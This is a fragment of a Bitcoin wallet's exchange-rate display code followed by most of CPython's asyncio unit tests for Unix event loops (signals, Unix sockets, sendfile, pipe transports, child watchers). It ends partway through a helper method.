%s" % (self.value_str(btc_balance, rate), self.ccy) def get_fiat_status_text(self, btc_balance, base_unit, decimal_point): rate = self.exchange_rate() return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit, self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy) def value_str(self, satoshis, rate): if satoshis is None: # Can happen with incomplete history return _("Unknown") if rate: value = Decimal(satoshis) / COIN * Decimal(rate) return "%s" % (self.ccy_amount_str(value, True)) return _("No data") def history_rate(self, d_t): rate = self.exchange.historical_rate(self.ccy, d_t) # Frequently there is no rate for today, until tomorrow :) # Use spot quotes in that case if rate is None and (datetime.today().date() - d_t.date()).days <= 2: rate = self.exchange.quotes.get(self.ccy) self.history_used_spot = True return rate def historical_value_str(self, satoshis, d_t): rate = self.history_rate(d_t) return self.value_str(satoshis, rate)
test_unix_events.py
"""Tests for unix_events.py.""" import collections import contextlib import errno import io import os import pathlib import signal import socket import stat import sys import tempfile import threading import unittest from unittest import mock from test import support if sys.platform == 'win32': raise unittest.SkipTest('UNIX only') import asyncio from asyncio import log from asyncio import base_events from asyncio import events from asyncio import unix_events from test.test_asyncio import utils as test_utils MOCK_ANY = mock.ANY def tearDownModule(): asyncio.set_event_loop_policy(None) def close_pipe_transport(transport): # Don't call transport.close() because the event loop and the selector # are mocked if transport._pipe is None: return transport._pipe.close() transport._pipe = None @unittest.skipUnless(signal, 'Signals are not supported') class SelectorEventLoopSignalTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = asyncio.SelectorEventLoop() self.set_event_loop(self.loop) def test_check_signal(self): self.assertRaises( TypeError, self.loop._check_signal, '1') self.assertRaises( ValueError, self.loop._check_signal, signal.NSIG + 1) def test_handle_signal_no_handler(self): self.loop._handle_signal(signal.NSIG + 1) def test_handle_signal_cancelled_handler(self): h = asyncio.Handle(mock.Mock(), (), loop=mock.Mock()) h.cancel() self.loop._signal_handlers[signal.NSIG + 1] = h self.loop.remove_signal_handler = mock.Mock() self.loop._handle_signal(signal.NSIG + 1) self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler_setup_error(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals m_signal.set_wakeup_fd.side_effect = ValueError self.assertRaises( RuntimeError, self.loop.add_signal_handler, signal.SIGINT, lambda: True) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler_coroutine_error(self, m_signal): m_signal.NSIG = signal.NSIG async def simple_coroutine(): pass # callback must not be a coroutine function coro_func = simple_coroutine coro_obj = coro_func() self.addCleanup(coro_obj.close) for func in (coro_func, coro_obj): self.assertRaisesRegex( TypeError, 'coroutines cannot be used with add_signal_handler', self.loop.add_signal_handler, signal.SIGINT, func) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals cb = lambda: True self.loop.add_signal_handler(signal.SIGHUP, cb) h = self.loop._signal_handlers.get(signal.SIGHUP) self.assertIsInstance(h, asyncio.Handle) self.assertEqual(h._callback, cb) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler_install_error(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals def set_wakeup_fd(fd): if fd == -1: raise ValueError() m_signal.set_wakeup_fd = set_wakeup_fd class Err(OSError): errno = errno.EFAULT m_signal.signal.side_effect = Err self.assertRaises( Err, self.loop.add_signal_handler, signal.SIGINT, lambda: True) @mock.patch('asyncio.unix_events.signal') @mock.patch('asyncio.base_events.logger') def test_add_signal_handler_install_error2(self, m_logging, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals class Err(OSError): errno = errno.EINVAL m_signal.signal.side_effect = Err self.loop._signal_handlers[signal.SIGHUP] = lambda: True self.assertRaises( RuntimeError, self.loop.add_signal_handler, signal.SIGINT, lambda: True) self.assertFalse(m_logging.info.called) self.assertEqual(1, m_signal.set_wakeup_fd.call_count) @mock.patch('asyncio.unix_events.signal') @mock.patch('asyncio.base_events.logger') def test_add_signal_handler_install_error3(self, m_logging, m_signal): class Err(OSError): errno = errno.EINVAL m_signal.signal.side_effect = Err m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.assertRaises( RuntimeError, self.loop.add_signal_handler, signal.SIGINT, lambda: True) self.assertFalse(m_logging.info.called) self.assertEqual(2, m_signal.set_wakeup_fd.call_count) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) self.assertTrue( self.loop.remove_signal_handler(signal.SIGHUP)) self.assertTrue(m_signal.set_wakeup_fd.called) self.assertTrue(m_signal.signal.called) self.assertEqual( (signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0]) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler_2(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.SIGINT = signal.SIGINT m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGINT, lambda: True) self.loop._signal_handlers[signal.SIGHUP] = object() m_signal.set_wakeup_fd.reset_mock() self.assertTrue( self.loop.remove_signal_handler(signal.SIGINT)) self.assertFalse(m_signal.set_wakeup_fd.called) self.assertTrue(m_signal.signal.called) self.assertEqual( (signal.SIGINT, m_signal.default_int_handler), m_signal.signal.call_args[0]) @mock.patch('asyncio.unix_events.signal') @mock.patch('asyncio.base_events.logger') def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) m_signal.set_wakeup_fd.side_effect = ValueError self.loop.remove_signal_handler(signal.SIGHUP) self.assertTrue(m_logging.info) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler_error(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) m_signal.signal.side_effect = OSError self.assertRaises( OSError, self.loop.remove_signal_handler, signal.SIGHUP) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler_error2(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) class Err(OSError): errno = errno.EINVAL m_signal.signal.side_effect = Err self.assertRaises( RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP) @mock.patch('asyncio.unix_events.signal') def test_close(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) self.loop.add_signal_handler(signal.SIGCHLD, lambda: True) self.assertEqual(len(self.loop._signal_handlers), 2) m_signal.set_wakeup_fd.reset_mock() self.loop.close() self.assertEqual(len(self.loop._signal_handlers), 0) m_signal.set_wakeup_fd.assert_called_once_with(-1) @mock.patch('asyncio.unix_events.sys') @mock.patch('asyncio.unix_events.signal') def test_close_on_finalizing(self, m_signal, m_sys): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) self.assertEqual(len(self.loop._signal_handlers), 1) m_sys.is_finalizing.return_value = True m_signal.signal.reset_mock() with self.assertWarnsRegex(ResourceWarning, "skipping signal handlers removal"): self.loop.close() self.assertEqual(len(self.loop._signal_handlers), 0) self.assertFalse(m_signal.signal.called) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'UNIX Sockets are not supported') class SelectorEventLoopUnixSocketTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = asyncio.SelectorEventLoop() self.set_event_loop(self.loop) @support.skip_unless_bind_unix_socket def test_create_unix_server_existing_path_sock(self): with test_utils.unix_socket_path() as path: sock = socket.socket(socket.AF_UNIX) sock.bind(path) sock.listen(1) sock.close() coro = self.loop.create_unix_server(lambda: None, path) srv = self.loop.run_until_complete(coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) @support.skip_unless_bind_unix_socket def test_create_unix_server_pathlib(self): with test_utils.unix_socket_path() as path: path = pathlib.Path(path) srv_coro = self.loop.create_unix_server(lambda: None, path) srv = self.loop.run_until_complete(srv_coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) def test_create_unix_connection_pathlib(self): with test_utils.unix_socket_path() as path: path = pathlib.Path(path) coro = self.loop.create_unix_connection(lambda: None, path) with self.assertRaises(FileNotFoundError): # If pathlib.Path wasn't supported, the exception would be # different. self.loop.run_until_complete(coro) def test_create_unix_server_existing_path_nonsock(self): with tempfile.NamedTemporaryFile() as file: coro = self.loop.create_unix_server(lambda: None, file.name) with self.assertRaisesRegex(OSError, 'Address.*is already in use'): self.loop.run_until_complete(coro) def test_create_unix_server_ssl_bool(self): coro = self.loop.create_unix_server(lambda: None, path='spam', ssl=True) with self.assertRaisesRegex(TypeError, 'ssl argument must be an SSLContext'): self.loop.run_until_complete(coro) def test_create_unix_server_nopath_nosock(self): coro = self.loop.create_unix_server(lambda: None, path=None) with self.assertRaisesRegex(ValueError, 'path was not specified, and no sock'): self.loop.run_until_complete(coro) def test_create_unix_server_path_inetsock(self): sock = socket.socket() with sock: coro = self.loop.create_unix_server(lambda: None, path=None, sock=sock) with self.assertRaisesRegex(ValueError, 'A UNIX Domain Stream.*was expected'): self.loop.run_until_complete(coro) def test_create_unix_server_path_dgram(self): sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) with sock: coro = self.loop.create_unix_server(lambda: None, path=None, sock=sock) with self.assertRaisesRegex(ValueError, 'A UNIX Domain Stream.*was expected'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'), 'no socket.SOCK_NONBLOCK (linux only)') @support.skip_unless_bind_unix_socket def test_create_unix_server_path_stream_bittype(self): sock = socket.socket( socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK) with tempfile.NamedTemporaryFile() as file: fn = file.name try: with sock: sock.bind(fn) coro = self.loop.create_unix_server(lambda: None, path=None, sock=sock) srv = self.loop.run_until_complete(coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) finally: os.unlink(fn) def test_create_unix_server_ssl_timeout_with_plain_sock(self): coro = self.loop.create_unix_server(lambda: None, path='spam', ssl_handshake_timeout=1) with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful with ssl'): self.loop.run_until_complete(coro) def test_create_unix_connection_path_inetsock(self): sock = socket.socket() with sock: coro = self.loop.create_unix_connection(lambda: None, sock=sock) with self.assertRaisesRegex(ValueError, 'A UNIX Domain Stream.*was expected'): self.loop.run_until_complete(coro) @mock.patch('asyncio.unix_events.socket') def test_create_unix_server_bind_error(self, m_socket): # Ensure that the socket is closed on any bind error sock = mock.Mock() m_socket.socket.return_value = sock sock.bind.side_effect = OSError coro = self.loop.create_unix_server(lambda: None, path="/test") with self.assertRaises(OSError): self.loop.run_until_complete(coro) self.assertTrue(sock.close.called) sock.bind.side_effect = MemoryError coro = self.loop.create_unix_server(lambda: None, path="/test") with self.assertRaises(MemoryError): self.loop.run_until_complete(coro) self.assertTrue(sock.close.called) def test_create_unix_connection_path_sock(self): coro = self.loop.create_unix_connection( lambda: None, os.devnull, sock=object()) with self.assertRaisesRegex(ValueError, 'path and sock can not be'): self.loop.run_until_complete(coro) def test_create_unix_connection_nopath_nosock(self): coro = self.loop.create_unix_connection( lambda: None, None) with self.assertRaisesRegex(ValueError, 'no path and sock were specified'): self.loop.run_until_complete(coro) def test_create_unix_connection_nossl_serverhost(self): coro = self.loop.create_unix_connection( lambda: None, os.devnull, server_hostname='spam') with self.assertRaisesRegex(ValueError, 'server_hostname is only meaningful'): self.loop.run_until_complete(coro) def test_create_unix_connection_ssl_noserverhost(self): coro = self.loop.create_unix_connection( lambda: None, os.devnull, ssl=True) with self.assertRaisesRegex( ValueError, 'you have to pass server_hostname when using ssl'): self.loop.run_until_complete(coro) def test_create_unix_connection_ssl_timeout_with_plain_sock(self): coro = self.loop.create_unix_connection(lambda: None, path='spam', ssl_handshake_timeout=1) with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful with ssl'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(os, 'sendfile'), 'sendfile is not supported') class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase): DATA = b"12345abcde" * 16 * 1024 # 160 KiB class MyProto(asyncio.Protocol): def __init__(self, loop): self.started = False self.closed = False self.data = bytearray() self.fut = loop.create_future() self.transport = None self._ready = loop.create_future() def connection_made(self, transport): self.started = True self.transport = transport self._ready.set_result(None) def data_received(self, data): self.data.extend(data) def connection_lost(self, exc): self.closed = True self.fut.set_result(None) async def wait_closed(self): await self.fut @classmethod def setUpClass(cls): with open(support.TESTFN, 'wb') as fp: fp.write(cls.DATA) super().setUpClass() @classmethod def tearDownClass(cls): support.unlink(support.TESTFN) super().tearDownClass() def setUp(self): self.loop = asyncio.new_event_loop() self.set_event_loop(self.loop) self.file = open(support.TESTFN, 'rb') self.addCleanup(self.file.close) super().setUp() def make_socket(self, cleanup=True): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setblocking(False) sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024) sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024) if cleanup: self.addCleanup(sock.close) return sock def run_loop(self, coro): return self.loop.run_until_complete(coro) def prepare(self): sock = self.make_socket() proto = self.MyProto(self.loop) port = support.find_unused_port() srv_sock = self.make_socket(cleanup=False) srv_sock.bind((support.HOST, port)) server = self.run_loop(self.loop.create_server( lambda: proto, sock=srv_sock)) self.run_loop(self.loop.sock_connect(sock, (support.HOST, port))) self.run_loop(proto._ready) def cleanup(): proto.transport.close() self.run_loop(proto.wait_closed()) server.close() self.run_loop(server.wait_closed()) self.addCleanup(cleanup) return sock, proto def test_sock_sendfile_not_available(self): sock, proto = self.prepare() with mock.patch('asyncio.unix_events.os', spec=[]): with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "os[.]sendfile[(][)] is not available"): self.run_loop(self.loop._sock_sendfile_native(sock, self.file, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_not_a_file(self): sock, proto = self.prepare() f = object() with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "not a regular file"): self.run_loop(self.loop._sock_sendfile_native(sock, f, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_iobuffer(self): sock, proto = self.prepare() f = io.BytesIO() with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "not a regular file"): self.run_loop(self.loop._sock_sendfile_native(sock, f, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_not_regular_file(self): sock, proto = self.prepare() f = mock.Mock() f.fileno.return_value = -1 with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "not a regular file"): self.run_loop(self.loop._sock_sendfile_native(sock, f, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_cancel1(self): sock, proto = self.prepare() fut = self.loop.create_future() fileno = self.file.fileno() self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) fut.cancel() with contextlib.suppress(asyncio.CancelledError): self.run_loop(fut) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) def test_sock_sendfile_cancel2(self): sock, proto = self.prepare() fut = self.loop.create_future() fileno = self.file.fileno() self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) fut.cancel() self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno, 0, None, len(self.DATA), 0) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) def test_sock_sendfile_blocking_error(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = mock.Mock() fut.cancelled.return_value = False with mock.patch('os.sendfile', side_effect=BlockingIOError()): self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) key = self.loop._selector.get_key(sock) self.assertIsNotNone(key) fut.add_done_callback.assert_called_once_with(mock.ANY) def test_sock_sendfile_os_error_first_call(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = self.loop.create_future() with mock.patch('os.sendfile', side_effect=OSError()): self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) exc = fut.exception() self.assertIsInstance(exc, asyncio.SendfileNotAvailableError) self.assertEqual(0, self.file.tell()) def test_sock_sendfile_os_error_next_call(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = self.loop.create_future() err = OSError() with mock.patch('os.sendfile', side_effect=err): self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno, 1000, None, len(self.DATA), 1000) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) exc = fut.exception() self.assertIs(exc, err) self.assertEqual(1000, self.file.tell()) def test_sock_sendfile_exception(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = self.loop.create_future() err = asyncio.SendfileNotAvailableError() with mock.patch('os.sendfile', side_effect=err): self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno, 1000, None, len(self.DATA), 1000) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) exc = fut.exception() self.assertIs(exc, err) self.assertEqual(1000, self.file.tell()) class UnixReadPipeTransportTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = self.new_test_loop() self.protocol = test_utils.make_test_protocol(asyncio.Protocol) self.pipe = mock.Mock(spec_set=io.RawIOBase) self.pipe.fileno.return_value = 5 blocking_patcher = mock.patch('os.set_blocking') blocking_patcher.start() self.addCleanup(blocking_patcher.stop) fstat_patcher = mock.patch('os.fstat') m_fstat = fstat_patcher.start() st = mock.Mock() st.st_mode = stat.S_IFIFO m_fstat.return_value = st self.addCleanup(fstat_patcher.stop) def read_pipe_transport(self, waiter=None): transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe, self.protocol, waiter=waiter) self.addCleanup(close_pipe_transport, transport) return transport def test_ctor(self): waiter = asyncio.Future(loop=self.loop) tr = self.read_pipe_transport(waiter=waiter) self.loop.run_until_complete(waiter) self.protocol.connection_made.assert_called_with(tr) self.loop.assert_reader(5, tr._read_ready) self.assertIsNone(waiter.result()) @mock.patch('os.read') def test__read_ready(self, m_read): tr = self.read_pipe_transport() m_read.return_value = b'data' tr._read_ready() m_read.assert_called_with(5, tr.max_size) self.protocol.data_received.assert_called_with(b'data') @mock.patch('os.read') def test__read_ready_eof(self, m_read): tr = self.read_pipe_transport() m_read.return_value = b'' tr._read_ready() m_read.assert_called_with(5, tr.max_size) self.assertFalse(self.loop.readers) test_utils.run_briefly(self.loop) self.protocol.eof_received.assert_called_with() self.protocol.connection_lost.assert_called_with(None) @mock.patch('os.read') def test__read_ready_blocked(self, m_read): tr = self.read_pipe_transport() m_read.side_effect = BlockingIOError tr._read_ready() m_read.assert_called_with(5, tr.max_size) test_utils.run_briefly(self.loop) self.assertFalse(self.protocol.data_received.called) @mock.patch('asyncio.log.logger.error') @mock.patch('os.read') def test__read_ready_error(self, m_read, m_logexc): tr = self.read_pipe_transport() err = OSError() m_read.side_effect = err tr._close = mock.Mock() tr._read_ready() m_read.assert_called_with(5, tr.max_size) tr._close.assert_called_with(err) m_logexc.assert_called_with( test_utils.MockPattern( 'Fatal read error on pipe transport' '\nprotocol:.*\ntransport:.*'), exc_info=(OSError, MOCK_ANY, MOCK_ANY)) @mock.patch('os.read') def test_pause_reading(self, m_read): tr = self.read_pipe_transport() m = mock.Mock() self.loop.add_reader(5, m) tr.pause_reading() self.assertFalse(self.loop.readers) @mock.patch('os.read') def test_resume_reading(self, m_read): tr = self.read_pipe_transport() tr.resume_reading() self.loop.assert_reader(5, tr._read_ready) @mock.patch('os.read') def test_close(self, m_read): tr = self.read_pipe_transport() tr._close = mock.Mock() tr.close() tr._close.assert_called_with(None) @mock.patch('os.read') def test_close_already_closing(self, m_read): tr = self.read_pipe_transport() tr._closing = True tr._close = mock.Mock() tr.close() self.assertFalse(tr._close.called) @mock.patch('os.read') def test__close(self, m_read): tr = self.read_pipe_transport() err = object() tr._close(err) self.assertTrue(tr.is_closing()) self.assertFalse(self.loop.readers) test_utils.run_briefly(self.loop) self.protocol.connection_lost.assert_called_with(err) def test__call_connection_lost(self): tr = self.read_pipe_transport() self.assertIsNotNone(tr._protocol) self.assertIsNotNone(tr._loop) err = None tr._call_connection_lost(err) self.protocol.connection_lost.assert_called_with(err) self.pipe.close.assert_called_with() self.assertIsNone(tr._protocol) self.assertIsNone(tr._loop) def test__call_connection_lost_with_err(self): tr = self.read_pipe_transport() self.assertIsNotNone(tr._protocol) self.assertIsNotNone(tr._loop) err = OSError() tr._call_connection_lost(err) self.protocol.connection_lost.assert_called_with(err) self.pipe.close.assert_called_with() self.assertIsNone(tr._protocol) self.assertIsNone(tr._loop) class UnixWritePipeTransportTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = self.new_test_loop() self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol) self.pipe = mock.Mock(spec_set=io.RawIOBase) self.pipe.fileno.return_value = 5 blocking_patcher = mock.patch('os.set_blocking') blocking_patcher.start() self.addCleanup(blocking_patcher.stop) fstat_patcher = mock.patch('os.fstat') m_fstat = fstat_patcher.start() st = mock.Mock() st.st_mode = stat.S_IFSOCK m_fstat.return_value = st self.addCleanup(fstat_patcher.stop) def write_pipe_transport(self, waiter=None): transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe, self.protocol, waiter=waiter) self.addCleanup(close_pipe_transport, transport) return transport def test_ctor(self): waiter = asyncio.Future(loop=self.loop) tr = self.write_pipe_transport(waiter=waiter) self.loop.run_until_complete(waiter) self.protocol.connection_made.assert_called_with(tr) self.loop.assert_reader(5, tr._read_ready) self.assertEqual(None, waiter.result()) def test_can_write_eof(self): tr = self.write_pipe_transport() self.assertTrue(tr.can_write_eof()) @mock.patch('os.write') def test_write(self, m_write): tr = self.write_pipe_transport() m_write.return_value = 4 tr.write(b'data') m_write.assert_called_with(5, b'data') self.assertFalse(self.loop.writers) self.assertEqual(bytearray(), tr._buffer) @mock.patch('os.write') def test_write_no_data(self, m_write): tr = self.write_pipe_transport() tr.write(b'') self.assertFalse(m_write.called) self.assertFalse(self.loop.writers) self.assertEqual(bytearray(b''), tr._buffer) @mock.patch('os.write') def test_write_partial(self, m_write): tr = self.write_pipe_transport() m_write.return_value = 2 tr.write(b'data') self.loop.assert_writer(5, tr._write_ready) self.assertEqual(bytearray(b'ta'), tr._buffer) @mock.patch('os.write') def test_write_buffer(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._buffer = bytearray(b'previous') tr.write(b'data') self.assertFalse(m_write.called) self.loop.assert_writer(5, tr._write_ready) self.assertEqual(bytearray(b'previousdata'), tr._buffer) @mock.patch('os.write') def test_write_again(self, m_write): tr = self.write_pipe_transport() m_write.side_effect = BlockingIOError() tr.write(b'data') m_write.assert_called_with(5, bytearray(b'data')) self.loop.assert_writer(5, tr._write_ready) self.assertEqual(bytearray(b'data'), tr._buffer) @mock.patch('asyncio.unix_events.logger') @mock.patch('os.write') def test_write_err(self, m_write, m_log): tr = self.write_pipe_transport() err = OSError() m_write.side_effect = err tr._fatal_error = mock.Mock() tr.write(b'data') m_write.assert_called_with(5, b'data') self.assertFalse(self.loop.writers) self.assertEqual(bytearray(), tr._buffer) tr._fatal_error.assert_called_with( err, 'Fatal write error on pipe transport') self.assertEqual(1, tr._conn_lost) tr.write(b'data') self.assertEqual(2, tr._conn_lost) tr.write(b'data') tr.write(b'data') tr.write(b'data') tr.write(b'data') # This is a bit overspecified. :-( m_log.warning.assert_called_with( 'pipe closed by peer or os.write(pipe, data) raised exception.') tr.close() @mock.patch('os.write') def test_write_close(self, m_write): tr = self.write_pipe_transport() tr._read_ready() # pipe was closed by peer tr.write(b'data') self.assertEqual(tr._conn_lost, 1) tr.write(b'data') self.assertEqual(tr._conn_lost, 2) def test__read_ready(self): tr = self.write_pipe_transport() tr._read_ready() self.assertFalse(self.loop.readers) self.assertFalse(self.loop.writers) self.assertTrue(tr.is_closing()) test_utils.run_briefly(self.loop) self.protocol.connection_lost.assert_called_with(None) @mock.patch('os.write') def test__write_ready(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._buffer = bytearray(b'data') m_write.return_value = 4 tr._write_ready() self.assertFalse(self.loop.writers) self.assertEqual(bytearray(), tr._buffer) @mock.patch('os.write') def test__write_ready_partial(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._buffer = bytearray(b'data') m_write.return_value = 3 tr._write_ready() self.loop.assert_writer(5, tr._write_ready) self.assertEqual(bytearray(b'a'), tr._buffer) @mock.patch('os.write') def test__write_ready_again(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._buffer = bytearray(b'data') m_write.side_effect = BlockingIOError() tr._write_ready() m_write.assert_called_with(5, bytearray(b'data')) self.loop.assert_writer(5, tr._write_ready) self.assertEqual(bytearray(b'data'), tr._buffer) @mock.patch('os.write') def test__write_ready_empty(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._buffer = bytearray(b'data') m_write.return_value = 0 tr._write_ready() m_write.assert_called_with(5, bytearray(b'data')) self.loop.assert_writer(5, tr._write_ready) self.assertEqual(bytearray(b'data'), tr._buffer) @mock.patch('asyncio.log.logger.error') @mock.patch('os.write') def test__write_ready_err(self, m_write, m_logexc): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._buffer = bytearray(b'data') m_write.side_effect = err = OSError() tr._write_ready() self.assertFalse(self.loop.writers) self.assertFalse(self.loop.readers) self.assertEqual(bytearray(), tr._buffer) self.assertTrue(tr.is_closing()) m_logexc.assert_not_called() self.assertEqual(1, tr._conn_lost) test_utils.run_briefly(self.loop) self.protocol.connection_lost.assert_called_with(err) @mock.patch('os.write') def test__write_ready_closing(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) tr._closing = True tr._buffer = bytearray(b'data') m_write.return_value = 4 tr._write_ready() self.assertFalse(self.loop.writers) self.assertFalse(self.loop.readers) self.assertEqual(bytearray(), tr._buffer) self.protocol.connection_lost.assert_called_with(None) self.pipe.close.assert_called_with() @mock.patch('os.write') def test_abort(self, m_write): tr = self.write_pipe_transport() self.loop.add_writer(5, tr._write_ready) self.loop.add_reader(5, tr._read_ready) tr._buffer = [b'da', b'ta'] tr.abort() self.assertFalse(m_write.called) self.assertFalse(self.loop.readers) self.assertFalse(self.loop.writers) self.assertEqual([], tr._buffer) self.assertTrue(tr.is_closing()) test_utils.run_briefly(self.loop) self.protocol.connection_lost.assert_called_with(None) def test__call_connection_lost(self): tr = self.write_pipe_transport() self.assertIsNotNone(tr._protocol) self.assertIsNotNone(tr._loop) err = None tr._call_connection_lost(err) self.protocol.connection_lost.assert_called_with(err) self.pipe.close.assert_called_with() self.assertIsNone(tr._protocol) self.assertIsNone(tr._loop) def test__call_connection_lost_with_err(self): tr = self.write_pipe_transport() self.assertIsNotNone(tr._protocol) self.assertIsNotNone(tr._loop) err = OSError() tr._call_connection_lost(err) self.protocol.connection_lost.assert_called_with(err) self.pipe.close.assert_called_with() self.assertIsNone(tr._protocol) self.assertIsNone(tr._loop) def test_close(self): tr = self.write_pipe_transport() tr.write_eof = mock.Mock() tr.close() tr.write_eof.assert_called_with() # closing the transport twice must not fail tr.close() def test_close_closing(self): tr = self.write_pipe_transport() tr.write_eof = mock.Mock() tr._closing = True tr.close() self.assertFalse(tr.write_eof.called) def test_write_eof(self): tr = self.write_pipe_transport() tr.write_eof() self.assertTrue(tr.is_closing()) self.assertFalse(self.loop.readers) test_utils.run_briefly(self.loop) self.protocol.connection_lost.assert_called_with(None) def test_write_eof_pending(self): tr = self.write_pipe_transport() tr._buffer = [b'data'] tr.write_eof() self.assertTrue(tr.is_closing()) self.assertFalse(self.protocol.connection_lost.called) class AbstractChildWatcherTests(unittest.TestCase): def test_not_implemented(self): f = mock.Mock() watcher = asyncio.AbstractChildWatcher() self.assertRaises( NotImplementedError, watcher.add_child_handler, f, f) self.assertRaises( NotImplementedError, watcher.remove_child_handler, f) self.assertRaises( NotImplementedError, watcher.attach_loop, f) self.assertRaises( NotImplementedError, watcher.close) self.assertRaises( NotImplementedError, watcher.__enter__) self.assertRaises( NotImplementedError, watcher.__exit__, f, f, f) class BaseChildWatcherTests(unittest.TestCase): def test_not_implemented(self): f = mock.Mock() watcher = unix_events.BaseChildWatcher() self.assertRaises( NotImplementedError, watcher._do_waitpid, f) WaitPidMocks = collections.namedtuple("WaitPidMocks", ("waitpid", "WIFEXITED", "WIFSIGNALED", "WEXITSTATUS", "WTERMSIG", )) class ChildWatcherTestsMixin: ignore_warnings = mock.patch.object(log.logger, "warning") def setUp(self): super().setUp() self.loop = self.new_test_loop() self.running = False self.zombies = {} with mock.patch.object( self.loop, "add_signal_handler") as self.m_add_signal_handler: self.watcher = self.create_watcher() self.watcher.attach_loop(self.loop) def waitpid(self, pid, flags): if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1: self.assertGreater(pid, 0) try: if pid < 0: return self.zombies.popitem() else: return pid, self.zombies.pop(pid) except KeyError: pass if self.running: return 0, 0 else: raise ChildProcessError() def add_zombie(self, pid, returncode): self.zombies[pid] = returncode + 32768 def WIFEXITED(self, status): return status >= 32768 def WIFSIGNALED(self, status): return 32700 < status < 32768 def WEXITSTATUS(self, status): 